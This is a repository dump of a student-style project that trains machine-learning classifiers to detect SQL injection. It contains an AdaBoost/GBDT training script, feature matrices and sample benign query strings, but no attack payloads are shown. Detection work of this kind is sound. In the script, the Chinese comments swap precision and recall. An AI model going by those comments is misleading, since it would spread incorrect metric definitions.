├── ML_for_SQL ├── .idea │ ├── ML_for_SQL.iml │ ├── inspectionProfiles │ │ └── profiles_settings.xml │ ├── misc.xml │ ├── modules.xml │ └── workspace.xml ├── README ├── __pycache__ │ └── featurepossess.cpython-36.pyc ├── adaboost.py ├── data │ ├── all_matrix.csv │ ├── all_matrix.txt │ ├── alltest_matrix.csv │ ├── nor_matrix.csv │ ├── normal_less.csv │ ├── normal_test.csv │ ├── nortest_matrix.csv │ ├── sql_matrix.csv │ ├── sql_test.csv │ ├── sqlnew.csv │ └── sqltest_matrix.csv ├── featurepossess.py ├── file │ ├── Adaboost.model │ ├── GBDT.model │ ├── bys.model │ ├── forestrandom.model │ ├── knn.model │ ├── lg.model │ ├── svm.model │ └── tree.model ├── sqlbys.py ├── sqlforestrandom.py ├── sqlkNN.py ├── sqllogistic.py ├── sqlsvm.py ├── sqltree.py └── testsql.py └── README.md /ML_for_SQL/.idea/ML_for_SQL.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 12 | -------------------------------------------------------------------------------- /ML_for_SQL/.idea/inspectionProfiles/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | -------------------------------------------------------------------------------- /ML_for_SQL/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /ML_for_SQL/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /ML_for_SQL/.idea/workspace.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 136 | 137 | 138 | 151 | 152 | 153 | 154 | 155 | true 156 | DEFINITION_ORDER 157 | 158 | 159 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 188 | 189 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 214 | 215 | 216 | 217 | 235 | 236 | 254 | 255 | 273 | 274 | 292 | 293 | 311 | 312 | 331 | 332 | 333 | 334 | 335 | 336 | 337 | 338 | 339 | 340 | 341 | 342 | 343 | 344 | 345 | 346 | 347 | 348 | 361 | 362 | 375 | 376 | 394 | 395 | 407 | 408 | project 409 | 410 | 411 | 412 | 413 | 414 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 422 | 423 | 424 | 443 | 444 | 460 | 461 | 462 | 463 | 464 | 465 | 466 | 467 | 468 | 469 | 470 | 471 | 472 | 473 | 474 | 475 | 476 | 477 | 478 | 480 | 481 | 482 | 483 | 1523458935612 484 | 488 | 489 | 490 | 491 | 492 | 493 | 494 | 495 | 496 | 497 | 498 | 499 | 500 | 501 | 502 | 503 | 504 | 505 | 506 | 507 | 508 | 509 | 510 | 511 | 512 | 513 | 514 | 515 | 516 | 518 | 519 | 521 | 522 | 523 | 524 | 525 | 526 | 527 | 528 | 529 | 530 | 531 | 532 | 533 | 534 | 535 | 536 | 537 | 538 | 539 | 540 | 541 | 542 | 543 | 544 | 545 | 546 | 547 | 548 | 549 | 550 | 551 | 552 | 553 | 554 | 555 | 556 | 557 | 558 | 559 | 560 | 561 | 562 | 563 | 564 | 565 | 566 | 567 | 568 | 569 | 570 | 571 | 572 | 573 | 574 | 575 | 576 | 577 | 578 | 579 | 580 | 581 | 582 | 583 | 584 | 585 | 586 | 587 | 588 | 589 | 590 | 591 | 592 | 593 | 594 | 595 | 596 | 597 | 598 | 599 | 600 | 601 | 602 | 603 | 604 | 605 | 606 | 607 | 608 | 609 | 610 | 611 | 612 | 613 | 614 | 615 | 616 | 617 | 618 | 619 | 620 | 621 | 622 | 623 | 624 | 625 | 626 | 627 | 628 | 629 | 630 | 631 | 632 | 633 | 634 | 635 | 636 | 637 | 638 | 639 | 640 | 641 | 642 | 643 | 644 | 645 | 646 | 647 | 648 | 649 | 650 | 651 | 652 | 653 | 654 | 655 | 656 | 657 | 658 | 659 | 660 | 661 | 662 | 663 | 664 | 665 | 666 | 667 | 668 | 669 | 670 | 671 | 672 | 673 | 674 | 675 | 676 | 677 | 678 | 679 | 680 | 681 | 682 | 683 | 684 | 685 | 686 | 687 | 688 | 689 | 690 | 691 | 692 | 693 | 694 | 695 | 696 | 697 | 698 | 699 | 700 | 701 | 702 | 703 | 704 | 705 | 706 | 707 | 708 | 709 | 710 | 711 | 712 | 713 | 714 | 715 | 716 | 717 | 718 | 719 | 720 | 721 | 722 | 723 | 724 | 725 | 726 | 727 | 728 | 729 | 730 | 731 | 732 | 733 | 734 | 735 | 736 | 737 | 738 | 739 | 740 | 741 | 742 | 743 | 744 | 745 | 746 | 747 | 748 | 749 | 750 | 751 | 752 | 753 | 754 | 755 | 756 | 757 | 758 | 759 | 760 | 761 | 762 | 763 | 764 | 765 | 766 | 767 | 768 | 769 | 770 | 771 | 772 | 773 | 774 | 775 | 776 | 777 | 778 | 779 | 780 | 781 | 782 | 783 | 784 | 785 | 786 | 787 | 788 | 789 | 790 | 791 | 792 | 793 | 794 | -------------------------------------------------------------------------------- /ML_for_SQL/README: -------------------------------------------------------------------------------- 1 | 本项目是使用机器学习算法来分类SQL注入语句与正常语句: 2 | 使用了SVM,Adaboost,决策树,随机森林,逻辑斯蒂回归,KNN,贝叶斯等算法分别对SQL注入语句与正常语句进行分类。 3 | data是收集的样本数据 4 | file中存放的是训练好的各个模型 5 | featurepossess.py是对原始样本进行预处理,提特征。 6 | sqlsvm.py等py文件是训练模型 7 | testsql是对训练好的模型进行测试,用准确率来度量模型效果。 8 | -------------------------------------------------------------------------------- /ML_for_SQL/__pycache__/featurepossess.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/__pycache__/featurepossess.cpython-36.pyc -------------------------------------------------------------------------------- /ML_for_SQL/adaboost.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | Created on Mon Nov 20 19:06:57 2017 4 | 5 | @author: wf 6 | """ 7 | import numpy as np 8 | import pandas as pd 9 | from sklearn import metrics 10 | from sklearn.tree import DecisionTreeClassifier 11 | from sklearn.ensemble import GradientBoostingClassifier 12 | from sklearn.ensemble import AdaBoostClassifier 13 | from sklearn.model_selection import train_test_split 14 | from featurepossess import generate 15 | from sklearn.externals import joblib 16 | 17 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1) 18 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0) 19 | 20 | df = pd.read_csv(sql_matrix) 21 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False) 22 | df = pd.read_csv( nor_matrix) 23 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+') 24 | 25 | feature_max = pd.read_csv('./data/all_matrix.csv') 26 | arr=feature_max.values 27 | data = np.delete(arr, -1, axis=1) #删除最后一列 28 | #print(arr) 29 | target=arr[:,7] 30 | #随机划分训练集和测试集 31 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=3) 32 | #模型 33 | model1=DecisionTreeClassifier(max_depth=5) 34 | model2=GradientBoostingClassifier(n_estimators=100) 35 | model3=AdaBoostClassifier(model1,n_estimators=100) 36 | model1.fit(train_data,train_target)#训练模型 37 | model2.fit(train_data,train_target)#训练模型 38 | model3.fit(train_data,train_target)#训练模型 39 | joblib.dump(model2, './file/GBDT.model')#梯度提升书算法 40 | print("GBDT.model has been saved to 'file/GBDT.model'") 41 | 42 | joblib.dump(model3, './file/Adaboost.model') 43 | print("Adaboost.model has been saved to 'file/Adaboost.model'") 44 | #clf = joblib.load('svm.model') 45 | y_pred1=model2.predict(test_data)#预测 46 | print("y_pred:%s"%y_pred1) 47 | print("test_target:%s"%test_target) 48 | #Verify 49 | print("GBDT:") 50 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred1))#查全率 51 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred1))#查准率 52 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred1))#混淆矩阵 53 | 54 | y_pred2=model3.predict(test_data)#预测 55 | print("y_pred:%s"%y_pred2) 56 | print("test_target:%s"%test_target) 57 | #Verify 58 | print("Adaboost:") 59 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred2))#查全率 60 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred2))#查准率 61 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred2))#混淆矩阵 62 | 63 | 64 | -------------------------------------------------------------------------------- /ML_for_SQL/data/all_matrix.txt: -------------------------------------------------------------------------------- 1 | 56.000000,0.000000,0.000000,0.089286,0.160714,0.035714,0.000000,1.000000 2 | 31.000000,0.000000,0.000000,0.032258,0.129032,0.000000,0.000000,1.000000 3 | 30.000000,0.000000,0.000000,0.066667,0.133333,0.033333,0.000000,1.000000 4 | 75.000000,0.000000,0.000000,0.026667,0.093333,0.013333,0.000000,1.000000 5 | 61.000000,0.000000,0.000000,0.065574,0.147541,0.000000,0.000000,1.000000 6 | 112.000000,0.000000,0.508929,0.008929,0.071429,0.008929,0.000000,1.000000 7 | 28.000000,0.000000,0.000000,0.000000,0.035714,0.035714,0.000000,1.000000 8 | 64.000000,0.000000,0.015625,0.031250,0.125000,0.015625,0.000000,1.000000 9 | 62.000000,0.000000,0.000000,0.112903,0.032258,0.000000,0.000000,1.000000 10 | 29.000000,0.000000,0.000000,0.000000,0.172414,0.000000,0.034483,1.000000 11 | 43.000000,0.000000,0.000000,0.023256,0.093023,0.023256,0.000000,1.000000 12 | 107.000000,0.000000,0.000000,0.018692,0.130841,0.037383,0.000000,1.000000 13 | 48.000000,0.000000,0.000000,0.083333,0.145833,0.020833,0.000000,1.000000 14 | 109.000000,0.000000,0.165138,0.045872,0.100917,0.027523,0.000000,1.000000 15 | 22.000000,0.000000,0.090909,0.090909,0.000000,0.000000,0.000000,1.000000 16 | 142.000000,0.000000,0.197183,0.119718,0.063380,0.028169,0.000000,1.000000 17 | 26.000000,0.000000,0.153846,0.000000,0.000000,0.000000,0.000000,1.000000 18 | 124.000000,0.000000,0.225806,0.120968,0.048387,0.032258,0.000000,1.000000 19 | 52.000000,0.000000,0.307692,0.038462,0.038462,0.019231,0.000000,1.000000 20 | 52.000000,0.000000,0.000000,0.000000,0.076923,0.000000,0.000000,1.000000 21 | 39.000000,0.000000,0.000000,0.051282,0.153846,0.000000,0.000000,1.000000 22 | 68.000000,0.000000,0.014706,0.029412,0.147059,0.000000,0.000000,1.000000 23 | 49.000000,0.000000,0.000000,0.081633,0.102041,0.000000,0.000000,1.000000 24 | 55.000000,0.000000,0.000000,0.000000,0.072727,0.000000,0.000000,1.000000 25 | 40.000000,0.000000,0.000000,0.075000,0.150000,0.000000,0.000000,1.000000 26 | 109.000000,0.000000,0.027523,0.055046,0.155963,0.018349,0.000000,1.000000 27 | 93.000000,0.000000,0.118280,0.032258,0.075269,0.010753,0.000000,1.000000 28 | 52.000000,0.000000,0.173077,0.019231,0.076923,0.019231,0.000000,1.000000 29 | 55.000000,0.000000,0.163636,0.036364,0.109091,0.018182,0.000000,1.000000 30 | 45.000000,0.000000,0.000000,0.000000,0.088889,0.000000,0.000000,1.000000 31 | 50.000000,0.000000,0.080000,0.000000,0.100000,0.000000,0.000000,1.000000 32 | 115.000000,0.000000,0.034783,0.000000,0.121739,0.000000,0.000000,1.000000 33 | 40.000000,0.000000,0.000000,0.000000,0.200000,0.000000,0.000000,1.000000 34 | 27.000000,0.000000,0.000000,0.148148,0.074074,0.000000,0.000000,1.000000 35 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000 36 | 64.000000,0.000000,0.000000,0.015625,0.109375,0.000000,0.000000,1.000000 37 | 54.000000,0.000000,0.000000,0.000000,0.129630,0.018519,0.000000,1.000000 38 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000 39 | 81.000000,0.000000,0.000000,0.012346,0.086420,0.000000,0.000000,1.000000 40 | 51.000000,0.000000,0.078431,0.000000,0.117647,0.019608,0.000000,1.000000 41 | 48.000000,0.000000,0.000000,0.000000,0.083333,0.000000,0.000000,1.000000 42 | 52.000000,0.000000,0.076923,0.000000,0.115385,0.000000,0.000000,1.000000 43 | 43.000000,0.000000,0.000000,0.069767,0.093023,0.000000,0.000000,1.000000 44 | 108.000000,0.000000,0.037037,0.083333,0.129630,0.000000,0.000000,1.000000 45 | 284.000000,0.000000,0.028169,0.042254,0.137324,0.000000,0.000000,1.000000 46 | 9.000000,0.000000,0.000000,0.333333,0.000000,0.111111,0.000000,1.000000 47 | 27.000000,0.000000,0.074074,0.222222,0.000000,0.000000,0.000000,1.000000 48 | 14.000000,0.000000,0.000000,0.142857,0.142857,0.071429,0.000000,1.000000 49 | 6.000000,0.000000,0.333333,0.333333,0.166667,0.166667,0.000000,1.000000 50 | 17.000000,0.000000,0.470588,0.235294,0.176471,0.117647,0.000000,1.000000 51 | 12.000000,0.000000,0.583333,0.083333,0.166667,0.000000,0.000000,1.000000 52 | 83.000000,0.000000,0.409639,0.240964,0.132530,0.024096,0.000000,1.000000 53 | 0.000000,0.000000,0.409639,0.240964,0.132530,0.024096,0.000000,1.000000 54 | 17.000000,0.000000,0.058824,0.823529,0.000000,0.000000,0.058824,0.000000 55 | 81.000000,0.000000,0.061728,0.493827,0.000000,0.000000,0.086420,0.000000 56 | 38.000000,0.000000,0.052632,0.605263,0.000000,0.000000,0.078947,0.000000 57 | 495.000000,0.000000,0.367677,0.202020,0.000000,0.000000,0.018182,0.000000 58 | 18.000000,0.000000,0.055556,0.833333,0.000000,0.000000,0.055556,0.000000 59 | 12.000000,0.000000,0.083333,0.750000,0.000000,0.000000,0.083333,0.000000 60 | 22.000000,0.000000,0.318182,0.590909,0.000000,0.000000,0.090909,0.000000 61 | 318.000000,0.000000,0.075472,0.415094,0.000000,0.000000,0.106918,0.000000 62 | 108.000000,0.000000,0.083333,0.583333,0.000000,0.000000,0.083333,0.000000 63 | 35.000000,0.000000,0.057143,0.657143,0.000000,0.000000,0.085714,0.000000 64 | 48.000000,0.000000,0.083333,0.375000,0.000000,0.000000,0.083333,0.000000 65 | 94.000000,0.000000,0.265957,0.563830,0.000000,0.000000,0.106383,0.000000 66 | 39.000000,0.000000,0.025641,0.230769,0.000000,0.000000,0.025641,0.000000 67 | 33.000000,0.000000,0.151515,0.515152,0.000000,0.000000,0.090909,0.000000 68 | 591.000000,0.000000,0.115059,0.407783,0.000000,0.003384,0.101523,0.000000 69 | 273.000000,0.000000,0.073260,0.479853,0.000000,0.000000,0.128205,0.000000 70 | 964.000000,0.000000,0.060166,0.409751,0.000000,0.000000,0.099585,0.000000 71 | 358.000000,0.000000,0.083799,0.550279,0.002793,0.000000,0.106145,0.000000 72 | 524.000000,0.000000,0.188931,0.356870,0.000000,0.000000,0.177481,0.000000 73 | 119.000000,0.000000,0.294118,0.218487,0.000000,0.000000,0.159664,0.000000 74 | -------------------------------------------------------------------------------- /ML_for_SQL/data/alltest_matrix.csv: -------------------------------------------------------------------------------- 1 | 56.000000,0.000000,0.000000.1,0.089286,0.160714,0.035714,0.000000.2,1.000000 2 | 31.0,0.0,0.0,0.032257999999999995,0.12903199999999998,0.0,0.0,1.0 3 | 30.0,0.0,0.0,0.06666699999999999,0.13333299999999998,0.033333,0.0,1.0 4 | 75.0,0.0,0.0,0.026667000000000003,0.093333,0.013333000000000001,0.0,1.0 5 | 61.0,0.0,0.0,0.06557400000000001,0.147541,0.0,0.0,1.0 6 | 112.0,0.0,0.508929,0.008929000000000001,0.07142899999999999,0.008929000000000001,0.0,1.0 7 | 28.0,0.0,0.0,0.0,0.035713999999999996,0.035713999999999996,0.0,1.0 8 | 64.0,0.0,0.015625,0.03125,0.125,0.015625,0.0,1.0 9 | 62.0,0.0,0.0,0.112903,0.032257999999999995,0.0,0.0,1.0 10 | 29.0,0.0,0.0,0.0,0.172414,0.0,0.034483,1.0 11 | 43.0,0.0,0.0,0.023256,0.09302300000000001,0.023256,0.0,1.0 12 | 107.0,0.0,0.0,0.018692,0.130841,0.037383,0.0,1.0 13 | 48.0,0.0,0.0,0.083333,0.145833,0.020833,0.0,1.0 14 | 109.0,0.0,0.165138,0.045872,0.10091699999999999,0.027523000000000002,0.0,1.0 15 | 22.0,0.0,0.090909,0.090909,0.0,0.0,0.0,1.0 16 | 142.0,0.0,0.197183,0.119718,0.06337999999999999,0.028169,0.0,1.0 17 | 26.0,0.0,0.153846,0.0,0.0,0.0,0.0,1.0 18 | 124.0,0.0,0.225806,0.120968,0.048387,0.032257999999999995,0.0,1.0 19 | 52.0,0.0,0.307692,0.038462,0.038462,0.019231,0.0,1.0 20 | 52.0,0.0,0.0,0.0,0.076923,0.0,0.0,1.0 21 | 39.0,0.0,0.0,0.05128200000000001,0.153846,0.0,0.0,1.0 22 | 68.0,0.0,0.014706,0.029412,0.147059,0.0,0.0,1.0 23 | 49.0,0.0,0.0,0.081633,0.10204099999999999,0.0,0.0,1.0 24 | 55.0,0.0,0.0,0.0,0.072727,0.0,0.0,1.0 25 | 40.0,0.0,0.0,0.075,0.15,0.0,0.0,1.0 26 | 109.0,0.0,0.027523000000000002,0.055046000000000005,0.15596300000000002,0.018349,0.0,1.0 27 | 93.0,0.0,0.11828,0.032257999999999995,0.075269,0.010753,0.0,1.0 28 | 52.0,0.0,0.173077,0.019231,0.076923,0.019231,0.0,1.0 29 | 55.0,0.0,0.163636,0.036364,0.10909100000000001,0.018182,0.0,1.0 30 | 45.0,0.0,0.0,0.0,0.088889,0.0,0.0,1.0 31 | 50.0,0.0,0.08,0.0,0.1,0.0,0.0,1.0 32 | 115.0,0.0,0.034783,0.0,0.12173900000000001,0.0,0.0,1.0 33 | 40.0,0.0,0.0,0.0,0.2,0.0,0.0,1.0 34 | 27.0,0.0,0.0,0.148148,0.074074,0.0,0.0,1.0 35 | 58.0,0.0,0.0,0.0,0.068966,0.0,0.0,1.0 36 | 64.0,0.0,0.0,0.015625,0.109375,0.0,0.0,1.0 37 | 54.0,0.0,0.0,0.0,0.12963,0.018519,0.0,1.0 38 | 58.0,0.0,0.0,0.0,0.068966,0.0,0.0,1.0 39 | 81.0,0.0,0.0,0.012346,0.08642000000000001,0.0,0.0,1.0 40 | 51.0,0.0,0.078431,0.0,0.117647,0.019608,0.0,1.0 41 | 48.0,0.0,0.0,0.0,0.083333,0.0,0.0,1.0 42 | 52.0,0.0,0.076923,0.0,0.11538499999999999,0.0,0.0,1.0 43 | 43.0,0.0,0.0,0.069767,0.09302300000000001,0.0,0.0,1.0 44 | 108.0,0.0,0.037037,0.083333,0.12963,0.0,0.0,1.0 45 | 284.0,0.0,0.028169,0.042254,0.137324,0.0,0.0,1.0 46 | 9.0,0.0,0.0,0.333333,0.0,0.11111099999999999,0.0,1.0 47 | 27.0,0.0,0.074074,0.22222199999999998,0.0,0.0,0.0,1.0 48 | 14.0,0.0,0.0,0.14285699999999998,0.14285699999999998,0.07142899999999999,0.0,1.0 49 | 6.0,0.0,0.333333,0.333333,0.166667,0.166667,0.0,1.0 50 | 17.0,0.0,0.470588,0.235294,0.17647100000000002,0.117647,0.0,1.0 51 | 12.0,0.0,0.583333,0.083333,0.166667,0.0,0.0,1.0 52 | 83.0,0.0,0.40963900000000003,0.24096399999999998,0.13253,0.024096,0.0,1.0 53 | 0.0,0.0,0.40963900000000003,0.24096399999999998,0.13253,0.024096,0.0,1.0 54 | 81.0,0.0,0.061728,0.493827,0.0,0.0,0.08642000000000001,0.0 55 | 38.0,0.0,0.052632000000000005,0.605263,0.0,0.0,0.078947,0.0 56 | 495.0,0.0,0.367677,0.20202,0.0,0.0,0.018182,0.0 57 | 18.0,0.0,0.055555999999999994,0.833333,0.0,0.0,0.055555999999999994,0.0 58 | 12.0,0.0,0.083333,0.75,0.0,0.0,0.083333,0.0 59 | 22.0,0.0,0.318182,0.590909,0.0,0.0,0.090909,0.0 60 | 318.0,0.0,0.075472,0.41509399999999996,0.0,0.0,0.10691800000000001,0.0 61 | 108.0,0.0,0.083333,0.583333,0.0,0.0,0.083333,0.0 62 | 35.0,0.0,0.05714299999999999,0.657143,0.0,0.0,0.085714,0.0 63 | 48.0,0.0,0.083333,0.375,0.0,0.0,0.083333,0.0 64 | 94.0,0.0,0.265957,0.56383,0.0,0.0,0.10638299999999999,0.0 65 | 39.0,0.0,0.025641000000000004,0.230769,0.0,0.0,0.025641000000000004,0.0 66 | 33.0,0.0,0.151515,0.515152,0.0,0.0,0.090909,0.0 67 | 591.0,0.0,0.115059,0.407783,0.0,0.0033840000000000003,0.101523,0.0 68 | 273.0,0.0,0.07326,0.479853,0.0,0.0,0.12820499999999999,0.0 69 | 964.0,0.0,0.060166,0.40975100000000003,0.0,0.0,0.099585,0.0 70 | 358.0,0.0,0.083799,0.550279,0.002793,0.0,0.106145,0.0 71 | 524.0,0.0,0.188931,0.35686999999999997,0.0,0.0,0.177481,0.0 72 | 119.0,0.0,0.294118,0.218487,0.0,0.0,0.159664,0.0 73 | -------------------------------------------------------------------------------- /ML_for_SQL/data/normal_test.csv: -------------------------------------------------------------------------------- 1 | _%3D1498591621808 2 | code%3Dzs_000001%2Czs_399001%2Czs_399006%26cb%3Dfortune_hq_cn%26_%3D1498591852632 3 | _%3D1498591951848%26list%3Dml_sh600030 4 | 6053%26ri%3Dzb6-00f%7E-04gUry-01h-0RC%26tn%3D1%26en%3D4L9RATiSWJ84cSXYcX1d2pqRNDaJDyf4dP2hUCLUFiZhTaWU7eK5dl5slq5E7SVvDi63oAKGfcJUNiy27jClo3XeVPICvXbMtyQIUjoFYYlnKQp0XlF0M2zO7d7ub-vumAdasuEscaZLfT5w2tfIKsHlHIn49b0u1Af1JUmZeCeIVpuTgEmDmxYz9GkgA-CCk-qVMZ-V2AfzTEe7HCLcljdw1NcVt-H26P2-dz8IEEj3n9DdQGwpErgkGR6SSbaJpPQu0IgaWmPZEZu-umlvd0urhn88rdu9-Dmn4hYWD2T-menxBL9BSplyy74mnP_4DZXvZ4Ggf4n-k6WXtWPDQYekUxo6XItLiBIOTt5znJ4l9AfspnGY604PtLC0WKwyjqwq27Z4zR9JZsSXxngF9UJFi9JrCW_yldU07E3r3q9LuHrEoy8%3E%3E 5 | b1498592370545%3D1 6 | v%3D13111002 7 | COLLCC%3D3442798258%26 8 | t%3Dcheck%26rec%3Dstratus%26etyp%3Dconnect%26zone%3Dzibo5_cnc%26url%3D119.188.143.32%26errCnt%3D327%26uid%3Dd0a47beafc75e1549c7fdc23530fd959%26uif%3DCNC%7CBeiJing-114.251.186.13%26tvid%3D7706069409%26defi%3D2%26dlod%3D1%26darea%3D1%26ppapi%3Dfalse%26trkip%3D119.188.143.32%26trkon%3D0%26ver%3D3.1.0.15%26dur%3D36431783 9 | cn_600022%2Ccn_600516%2Ccn_000002%2Ccn_600519%2Ccn_000651%2Ccn_600887%2Ccn_002415%2Ccn_601288%2Ccn_000333%2C 10 | _%3D1498179095094%26list%3Dsh600030 11 | q%3DmarketStat%2Cstdunixtime%26_%3D1498584939540 12 | _%3D1498584888937/%26list%3DFU1804%2CFU0%2CFU1707%2CFU1708%2CFU1709%2CFU1710%2CFU1711%2CFU1712 13 | callback%3D_ntes_quote_callback54388229 14 | _%3D1498552987540%26list%3Dhf_OIL 15 | prod%3D56%26systype%3D0%26cid%3D4%26log%3Dact%26from%3D3%263th%3D0%26adTime%3D0%26adType%3Dswf%26dmpt%3Dpad%26po%3Db%26adUrl%3Dhttp%3A//images.sohu.com/ytv/BJ/BJSC/400300201512181625132.swf%26type%3D1%26du%3D500%26al%3D-4%26out%3D0%26au%3D1%26vid%3D130369828%26qd%3Dabbdd136abdb8172%26rt%3D5fd0898fd5ebcf4096145bd7eb4f0bd5%26uv%3D14985797034557443254%26uuid%3D39f371e0-c882-9cdd-fdd7-ea98faf2f9e3%26vt%3D56flash%26rd%3Dwww.56.com%26isIf%3D0%26suv%3D1706280006344804%26uid%3D14985797034557443254%26scookie%3D2%26bad%3D3%26sign%3DTA3ccJAWUeypt831iciWkCbZaSRfhUcmDUDcQDBQDj_tpUXIMgFg-X4ku%3E%3E 16 | tu%3Du1889066%26op%3D1%26jk%3Da014e4716ffd54c4%26word%3Dhttp%3A//www.39yst.com/tieshi/yinshi/481666_2.shtml%26if%3D0%26aw%3D670%26ah%3D90%26pt%3D20500%26it%3D0%26vt%3D0%26csp%3D1024%2C738%26bcl%3D1007%2C624%26pof%3D1007%2C4516%26top%3D3776%26left%3D14%26rdm%3D1498585089587 17 | flag%3Dplyract%26plyract%3Dtiming%26prgr%3D75%26lostfrm%3D13%26lostfrmsec%3D1%26tl%3D60%26src%3D%26purl%3Dhttp%3A//www.iqiyi.com/v_19rr7sryv0.html%23curid%3D710171500_9128e16fccd25dd00ca053a1da504df3%26rfr%3Dhttp%3A//www.iqiyi.com/a_19rrhalt31.html%26lrfr%3Dhttps%3A//www.2345.com/%3Fkbox73713266%26aid%3D203965201%26tvid%3D710171500%26vid%3D284da491e1954fe385336e0054af677f%26cid%3D10%26lev%3D96%26puid%3D%26pru%3D%26veid%3D0f37150b10b8d342bb591c2611b35b41%26weid%3D32c87fb9fc3345fec7cace29952f950d%26newusr%3D0%26pla%3D11%26visits%3D%26sttntp%3D0%26plyrtp%3D0%26plyrver%3D3.3.12.22%26z%3Dqingdao4_cmnet%26suid%3D3911317fef78e8c179aef11a83c22c15%26diaoduuip%3DCMNET%7CBeiJing-218.205.147.2%26plid%3D%26vvfrom%3D%26vfrm%3D10-2-0-1%26vfm%3D%26restp%3D2%26ispur%3D0%26as%3D0ffa7999c6c7c070df03efccc58a6ec3%26qdv%3D2%26bstp%3D6%26isdm%3D0%26isstar%3D0%26hu%3D%26mod%3Dcn_s%26videotp%3D0%26stime%3D1498585048072%26server_ip%3D120.221.22.137%26tn%3D0.021188411861658096 18 | s%3D1498585170292%26y%3Dqc_100001_100015%26e%3D1c37a278a281ec7359f4b0a8e75afe92%26g%3D0%26rd%3D2052%26ps%3D0%26h%3D0%26rc%3D1%26c%3D10%26b%3D203965201%26d%3D71%26a%3D16b34fd092c694bc28eebd634829bc83%26l%3DMTA2LjM3LjIwNC4y%26p%3Ds%26av%3DAdManager%204.0.9%26rid%3Df15a9d21816f582f28fa242f983226dd%26vv%3D5.3.2.67%26t%3Ds%26u%3D3911317fef78e8c179aef11a83c22c15 19 | t%3D1498533566250%26rst%3Dswf%2Cimg%26ct%3Dd%26cs%3D2074%26td%3D%26s%3D310736%26v%3D710297211%26u%3D1154411548%26k%3D%E5%86%9B%E5%B8%88%E8%81%94%E7%9B%9F%7C%26paid%3D1%26tt%3D%E5%A4%A7%E5%86%9B%E5%B8%88%E5%8F%B8%E9%A9%AC%E6%87%BF%E4%B9%8B%E5%86%9B%E5%B8%88%E8%81%94%E7%9B%9F%2B10%26pu%3Dhttp%3A//v.youku.com/v_show/id_XMjg0MTE4ODg0NA%3D%3D.html%3Ffrom%3Dy1.2-2.2%26ref%3Dhttp%3A//v.youku.com/v_show/id_XMjg0MTExNDMwNA%3D%3D.html%3Fspm%3Da2h0j.8191423.item_XMjg0MTExNDMwNA%3D%3D.A%26sid%3D1bjjov5pb2l1k%26p%3D323%26_%3D%3E%3E 20 | type%3DgetUserSetCarIcon%26carId%3D460018499102909%26direction%3D%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%26carIconType%3D0 21 | -------------------------------------------------------------------------------- /ML_for_SQL/data/nortest_matrix.csv: -------------------------------------------------------------------------------- 1 | 17.000000,0.000000,0.058824,0.823529,0.000000,0.000000,0.058824,0.000000 2 | 81.000000,0.000000,0.061728,0.493827,0.000000,0.000000,0.086420,0.000000 3 | 38.000000,0.000000,0.052632,0.605263,0.000000,0.000000,0.078947,0.000000 4 | 495.000000,0.000000,0.367677,0.202020,0.000000,0.000000,0.018182,0.000000 5 | 18.000000,0.000000,0.055556,0.833333,0.000000,0.000000,0.055556,0.000000 6 | 12.000000,0.000000,0.083333,0.750000,0.000000,0.000000,0.083333,0.000000 7 | 22.000000,0.000000,0.318182,0.590909,0.000000,0.000000,0.090909,0.000000 8 | 318.000000,0.000000,0.075472,0.415094,0.000000,0.000000,0.106918,0.000000 9 | 108.000000,0.000000,0.083333,0.583333,0.000000,0.000000,0.083333,0.000000 10 | 35.000000,0.000000,0.057143,0.657143,0.000000,0.000000,0.085714,0.000000 11 | 48.000000,0.000000,0.083333,0.375000,0.000000,0.000000,0.083333,0.000000 12 | 